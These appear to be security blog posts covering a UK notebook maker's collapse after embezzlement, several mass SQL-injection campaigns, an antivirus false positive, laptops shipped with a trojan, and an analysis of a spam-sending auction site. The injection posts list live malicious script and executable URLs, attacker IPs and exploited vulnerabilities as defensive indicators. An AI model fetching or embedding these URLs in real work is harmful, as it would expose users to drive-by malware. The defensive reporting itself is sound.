Rock Group plc / rockdirect.com in administration

UK notebook manufacturer Rock Group plc has gone into administrator (i.e. bankruptcy). A well-regarded supplier of high end notebooks, Rock's financial difficulties are rather unusual.

You might expect that a combination of the "credit crunch" and depressed sales due to the unpopularity of Windows Vista might be to blame, but it appears that the root cause of the problem was sales director Paul Bicknell who stole a staggering £200,000 from the company which led to serious cashflow problems. Bicknell squandered the money on online gambling sites and fast cars and was subsequently sentenced to three years in prison. More details here and here. Perhaps Bicknell took Rock's "change your life" slogan rather too seriously.

Deloitte & Touche LLP are the administrators, customers and trading partners should read the Rock press release and check the company web site for more details.

It's a shame to see a good company go under in such circumstances, but what is even more bizarre is that an employee's gambling addiction cause the problem.

(Tip: if you like a flutter rather too much and live in the UK, try talking to a counselling service such as GamCare). There are other similar services worldwide.

winzipices.cn and bbs.jueduizuan.com - another SQL injection attack

The ISC has warned about another SQL Injection attack, following on from this one a few weeks ago. This time the injection is inserting a script pointing to the winzipices.cn and bbs.jueduizuan.com domains.

The malicious script is pointing to winzipices.cn/1.js, winzipices.cn/2.js, winzipices.cn/3.js, winzipices.cn/4.js and winzipices.cn/5.js and also bbs.jueduizuan.com/ip.js. As ever, don't visit these sites unless you know what you are doing.

Right at the moment, winzipices.cn is coming up with a server error, but bbs.jueduizuan.com is functioning just fine. This tries to attack visiting systems using the MS07-004 vulnerability, a RealPlayer vulnerability plus it attempts to download an executable from www.bluell.cn/ri.exe possibly using a shell vulnerability (VirusTotal analysis here, mostly detected as Trojan.Win32.Agent.lpv, Trojan.MulDrop.origin or TR/Dropper.Gen).

Some IP addresses:
www.bluell.cn is 60.191.239.219
winzipices.cn is 60.191.239.229
bbs.jueduizuan.com is 60.191.239.219

My recommendation is to block access to the entire 60.191.239.x range if you can.

The the moment, a Google search for winzipices.cn shows 1790 matches, for jueduizuan.com it is 1640 matches. Expect those figures to climb sharply.

If you are running an impacted SQL server, then you need to secure it and perform better validation, else the problem will happen again. Client machines should be protected if they are fully up-to-date on patches, if you have been infected then use the excellent Secunia Software Inspector to check your system for vulnerable apps.

As always, there are some high profile sites that have been compromised. They may well have been cleaned up by now, so inclusion here does not mean that they are unsafe or safe to visit.

bbs.jueduizuan.com

• safecanada.ca (Canadian Homeland Security again).
• breastcanceradvice.com, arthritisissues.com, menssexhealth.com, www.bipolardepressioninfo.com (Health)
• dubaicityguide.com (Travel)
• classicdriver.com (Motoring)

winzipices.cn

• imo.org (International Maritime Organisation)
• cifas.org.uk (Fraud Prevention)
• hmdb.org (Historical Marker Database)
• abbyy.com (OCR software)
• cancerissues.com, adhdissues.com, depressionissues.com, diabeticdiets.org, erectilefacts.com, prostatecancerissues.com, digestivefacts.com (Health)
• www.asiamedia.ucla.edu, www.international.ucla.edu, www.asiaarts.ucla.edu, www.isop.ucla.edu (UCLA)
• newmarket.travel (Travel)
• discoverireland.ie (Travel)
• gay.tv (Lifestyle)

Some of these sites are regularly infected with SQL injection attacks, and safecanada.ca was infected with the last major outbreak. The problem is that once a site has been attacked and enumerated, then it will be attacked again and again until it is fixed.

As mentioned before, there is no such thing as a safe site.

nihaorr1.com - there's no such thing as a "safe" site

Websense gave a heads up about yet another mass defacement, impacting a few high profile web sites. Just to make life difficult, they didn't specify the domain in use.. but it isn't exactly rocket science to find out that it is nihaorr1.com.

I'm going to make an assumption that if you're reading this blog, you're at least somewhat technically savvy. Don't visit any of these sites unless you know what you are doing.

Googling nihaorr1.com/1.js brings up several thousand matches. Surprisingly, an eximination of www.nihaorr1.com/1.js shows that it is not obfuscated at all and points to www.nihaorr1.com/1.htm.. and that has all the exploits nicely laid out - MS07-055, MS07-033, MS07-018, MS07-004 and MS06-014. Also there are exploits for RealPlayer, Ajax, QQ Instant Messenger and some sort of Yahoo! product (probably Instant Messenger).


If your site has been compromised and you're looking for answers.. well, all I can tell you is that it will have been done through some sort of SQL Injection similar to this one.

If you're supporting client PCs that are fully patched, you have a little less to worry about unless you have RealPlayer or Yahoo! IM installed. Perhaps it is a good time to consider banning these applications in any case, particularly RealPlayer which is a very common vector for attack.

Why do I say there's no such thing as a "safe" site? Well, among the compromised sites are the following:

www.redmondmag.com [Independent publication about Microsoft]
www.pocketpcmag.com [Smartphone & Pocket PC magazine]
www.careers.civil-service.gov.uk [UK Civil Service]
www.faststream.gov.uk [UK Civil Service]
www.safecanada.ca [Canadian National Security]
www.n-somerset.gov.uk [UK Local Government]
events.un.org [United Nations]
www.unicef.org.uk [UNICEF]
www.iphe.org.uk [Institute of Plumbing and Heating Engineering]
www.umc.org [United Methodist Church]
www.umita.org [United Methodist Information Technology Association]
www.simplyislam.co.uk [Islamic Information site]
www.rsa.org.uk [Royal Society for the Encouragement of Arts]
www.24.com [Sports]
www.oddbins.co.uk [Major UK wine retailer]
www.avx.com [Electronic components]
www.advantech.com [Computer components]
www.aeroflot.aero [Airline]
www.aeroflot.ru [Airline]

In other words, you can't rely on the site you are visiting to be safe.. so the onus is on the end user to make sure their PC is fully patched and as secure as possible.

Win32/Loodok!generic.2 in SYSTEM.DLL - likely false positive

We're getting a plague of these with eTrust (pattern 5723):

[time 22/04/2008 12:54:21: ID 14: machine xxxxx.com: response 22/04/2008 12:54:46] The Win32/Loodok!generic.2 was detected in C:\DOCUME~1\XXXXX\LOCALS~1\TEMP...\SYSTEM.DLL. Machine: XXXXX, User: XXXXX\xxxxx. Status: File was cured; system cure performed.

The subdirectory varies, but it is usually %user profiles%\local settings\temp\ns???.tmp where the question marks indicate a random letter/number. You may find that the subdirectory has vanished by the time you investigate.

This appears to be happening with the installer for Firefox (also tested with Netscape Navigator). You can see the problem if you snooze the AV scanner and then fire up the Firefox installer and leave it running.. the SYSTEM.DLL is clearly there.

Apart from eTrust, VirusTotal gives it a clean bill of health.

You may be seeing this fire off by itself if a software package is autoupdating. I can't identify exactly which installer is in use here, but it is likely to be shared between many other applications.. so expect a storm of these.

As usual with false positives, expect a fix to be issued by CA very soon. The problem seems to be with pattern 5723, so updating to a later virus signature should probably cure it.

Added: Pattern 5724 also reports a positive, but the beta version of 5725 does not. You can download beta signatures from CA here.

Added: 5725 is now available for download as normal, this should cure the problem!

RavMon.exe virus on new Toshiba Satellite laptop from Comet, Part II

A few weeks ago I wrote about a new laptop with a virus preloaded that was bought from Comet. As far as I knew, I was the only person to have this problem but after carefully checking everything that I had done to set up the machine, my conclusion was that the RAVMON.EXE malware was preloaded on the PC.. but perhaps it was a one-off.

Not so. From the comments on the post, it seems that Toshiba laptops from Currys and PC World have the problem, over at the Irreverence Is Justified blog, it turns out that exactly the same thing has happened. Same virus, same model of Toshiba and Comet (again).

Detections were varied, but it appears to be a trojan that possibly loads itself on via a USB key. The implication is that some part of the manufacturing process / preparation is compromised with infected USB devices.

So Toshiba's manufacturer process is compromised? Well, it appears to be.. but almost definitely an accident rather than a malicious act. Presumably there are many more L40-18Z laptops with the same problem..

2117966.net revisited

Last month I blogged about Trend Micro's website being compromised as well as thousands of others with an IFRAME injection to 2117966.net .

The ISC has followed up with an analysis of the tool used to compromise the sites. It uses an SQL injection attack to infect the server, but the interesting thing is that it uses Google to enumerate the vulnerable sites first, a technique called Google Hacking.

I guess there are a few things to note here - despite the ubiquitousness of SQL, it can still be tricky to set up and is best left to people who know what they are doing. Keep your patches up-to-date, and consider carefully if you want Google (or any other search engine) to be able to index your WHOLE site and adjust your robots.txt if necessary.

The ISC article also links to some good resources if you want to properly secure your database.

ezBay.me.uk - or how NOT to start an online business

Sometimes, people make mistakes with their online marketing. Newbies can accidentally buy a "millions of email addresses CD" with a load of scraped email addresses and spam away. Sometimes they are not aware of trademark laws. But sometimes they are just plain stupid in so many ways that there is no excuse for not ripping into them.

Mistake One - Trademark Violation
In this case, the budding entrepreneur has gone for the name ezBay.me.uk - confusingly similar to a well-known auction company called eBay. Sure, there are other users of the "ezbay" name, but the closeness of the name and even the "camel case" capitalisation are asking for trouble, possibly some years down the line.. but trouble nonetheless.

Mistake Two - Choose a stupid domain name.
Not only does "ezbay.me.uk" possibly violate trademarks, but it uses the ".me.uk" namespace which is designed for personal use only. That could well lead to the name being revoked by the registrar. Worse, the name doesn't make sense in British English - "Ee Zed Bay"? In American English it's "Easy Bay" which *does* makes sense.. but not in conjunction with a .me.uk domain name.

Mistake Three - Spam
There's no excuse for sending out unsolicited bulk email to scraped email address, but ezBay.me.uk have done exactly that. That tends to lead to a very short life expectancy for the new auction site that you have just created.

---

EZBAY
24/7 online Auction Site

This is our new 24/7 on line auction please feel free to take a look if you like what you find please register and we will give you £20.00 sellers fee completely free there is no listing fee for items that you may want to sell so what are you waiting for sign up to day for your £20.00 and start selling at www.ezbay.me.uk feel free to take a look around at all the bargins
we have many less than 50% cheaper than the high street price so come on see
how easy it is with ezbay happy shopping

BRAND NEW AUCTION

Car DVD player starting bid 50p buy now price £139.00

MP4 player with 1.3m pixels digital camera 2.5in TFT screen starting bid 50p buy now price £32.90

12mp digital video camera with MP3/MP4 starting bid 50p buy now price £76.00

1.1 inch screen clip MP3 player starting bid 50p buy now price £8.50

12.1-inch with 4:3 display roof mount TFT-LCD monitor Starting bid 50p buy now price £62.50

MP3 player sunglasses with FM super-plastic frame and build-in 1 GB flash
memory starting bid 50p buy now price

best regards

mr a m dick
ezbay world

Mistake Four - Be offensive
Signing off an email with a name of "Mr A M Dick" is always likely to annoy people (unless that is the person's name in which case.. oh dear).

Mistake Five - Read Receipts
Not only is this spam, but it also sent out with a read receipt in a clumsy way to confirm the recipient's email address. Not only will the muppet sending out the spam be overwhelmed with receipts, but many people regard them as invasive of privacy.

---

The forensics..
The headers indicate that the mail comes from 75.125.202.82 which is also the IP address of www.ezbay.me.uk, so that's pretty much a smoking gun.

The domain name is registered to:

     Domain name:
ezbay.me.uk

Registrant:
Ezbay

Registrant type:
UK Individual

Registrant's address:
8 Calle Las Encines
Fuenta De Piedra
Malaga
295 30
ES

Last time I checked, Malaga wasn't in the UK. This address is connected with an Alibaba operation called Murrays Discount.

There's no evidence that this is a scam, but it is almost a textbook example of how to kill a business before it starts. It is notable that despite the spam run, the only person actually selling is "Murray" himself.